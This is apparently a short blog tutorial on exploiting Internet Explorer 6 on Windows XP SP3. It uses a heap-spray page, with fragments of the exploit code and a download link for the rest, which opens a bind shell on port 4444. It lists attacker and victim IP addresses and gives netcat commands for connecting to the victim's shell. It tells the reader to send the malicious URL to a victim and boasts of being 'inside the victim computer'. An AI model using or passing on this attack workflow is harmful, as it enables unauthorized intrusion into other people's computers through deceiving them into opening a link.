Type : Tutorial
Level : Easy
This tutorial is the same with IE 6,7,8 Exploit using Metasploit, but I try to make it more simple for you.
1. Arbitrary Code(Don't open it with Internet Explorer, but use text editor to modify)
FAKEOBJ = alloc(233120, FAKEOBJ); // IE6 mshtml.dll Version 6.0.2900.5512
//FAKEOBJ = alloc(1550371, FAKEOBJ); // oy oy oy huge spray!
Download Source Code
2. NetCat (Windows/Linux)
My IP Address : 192.168.1.8 (attacker)
Victim IP Address : 192.168.1.3(Windows Xp SP3-IE6)
2. Open your NetCat, an do this command nc -nv 192.168.1.3 4444. We will try to connect using port 4444 because the arbitrary code will open port 4444 in remote computer.
If we execute the NetCat and user still not open the arbitrary code, there's nothing happened.
3. Send the URL to your victim (http://192.168.1.8/exploit/index.html) where index.html is your arbitrary code.
4. After the user open the URL, run once again your NetCat with nc -nv 192.168.1.3 4444 and see what's happen 🙂 You've already inside the victim computer.
I hope this post is useful for you. If have any questions, just drop down your comment here.